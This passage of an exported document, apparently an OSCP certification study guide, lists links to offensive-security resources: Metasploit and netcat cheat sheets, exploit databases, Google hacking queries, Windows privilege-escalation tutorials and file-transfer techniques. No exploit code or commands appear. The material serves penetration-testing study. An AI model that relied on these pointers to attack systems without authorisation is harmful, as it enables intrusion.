text:c="4"/>[*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Security Hardening CentO 7<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>MetaSploit Cheatsheet<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Google Hacking Database:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Assembly Language Mega Primer<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*http://www.securitytube.net/groups?operation=view&amp;groupId=6*](http://www.securitytube.net/groups?operation=view&amp;groupId=6)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Linux Assembly Language Mega Primer<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*http://www.securitytube.net/groups?operation=view&amp;groupId=5*](http://www.securitytube.net/groups?operation=view&amp;groupId=5)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Metasploit Cheat Sheet<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>A bit dated but most is still relevant<text:line-break/><text:line-break/>[*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html)<text:line-break/><text:line-break/>-<text:s text:c="3"/>NetCat<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*http://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)<text:line-break/><text:line-break/>Essentials<text:line-break/>========================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Exploit-db<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.exploit-db.com/*](https://www.exploit-db.com/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>SecurityFocus - Vulnerability database<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*http://www.securityfocus.com/*](http://www.securityfocus.com/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Vuln Hub - Vulnerable by design<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.vulnhub.com/*](https://www.vulnhub.com/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Exploit Exercises<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://exploit-exercises.com/*](https://exploit-exercises.com/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>SecLists - collection of multiple types of lists used during<text:line-break/><text:s text:c="4"/>security assessments. List types include usernames, passwords, URLs,<text:line-break/><text:s text:c="4"/>sensitive data grep strings, fuzzing payloads<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Security Tube<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*http://www.securitytube.net/*](http://www.securitytube.net/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Metasploit Unleashed - free course on how to use Metasploit<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.offensive-security.com/metasploit-unleashed*](https://www.offensive-security.com/metasploit-unleashed/)*/*<text:line-break/><text:line-break/>-<text:s text:c="3"/>0Day Security Enumeration Guide<text:line-break/><text:s text:c="4"/>[*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-testing/enumeration.html)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Github IO Book - Pen Testing Methodology<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)<text:line-break/><text:s text:c="4"/><text:line-break/>Windows Privledge Escalation<text:line-break/>========================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Fuzzy Security<text:line-break/><text:s text:c="4"/>[*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>accesschk.exe<text:line-break/><text:s text:c="4"/>https://technet.microsoft.com/en-us/sysinternals/bb664922<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Priv Escalation For Pen Testers<text:line-break/><text:s text:c="4"/>https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/<text:line-break/><text:line-break/>-<text:s text:c="3"/>Elevating Privileges to Admin and Further<text:line-break/><text:s text:c="4"/>https://hackmag.com/security/elevating-privileges-to-administrative-and-further/<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>Transfer files to windows machines<text:line-break/><text:s text:c="4"/>https://blog.netspi.com/15-ways-to-download-a-file/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2T18::47:57</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-08-02T18::47:57</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>seguridad:enlaces:certificaciones:oscp:oscp-survival-guide</dc:title>
  </office:meta>
</office:document-meta>
</file>